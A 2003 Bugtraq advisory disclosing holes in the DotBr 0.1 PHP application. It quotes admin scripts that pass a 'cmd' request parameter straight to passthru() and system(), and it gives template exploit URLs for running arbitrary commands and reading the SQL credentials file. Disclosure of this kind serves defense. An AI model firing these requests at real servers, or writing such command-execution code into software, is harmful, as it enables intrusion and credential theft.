[28918] in bugtraq
DotBr (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Feb 18 11:01:41 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sat, 15 Feb 2003 10:55:19 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F136NqFJ3sl3xbYiMCI00009935@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Informations disclosure
- System commands execution
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
foo.php3 :
---------------------
<? phpinfo(); ?>
---------------------
config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name
admin/exec.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
if (!isset($sep)) {
$sep = "_";
}
$cmd=str_replace($sep," ",$cmd);
passthru($cmd,$ret);
echo $ret;
?>
</pre>
</body>
</html>
---------------------------------------
admin/system.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
$cmd = str_replace("_"," ",$cmd);
system($cmd,$result);
echo "\n result == ". $result . "\n";
?>
</pre>
</body>
</html>
---------------------------------------
Exploits :
°°°°°°°°°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
http://www.phpsecure.org
_________________________________________________________________
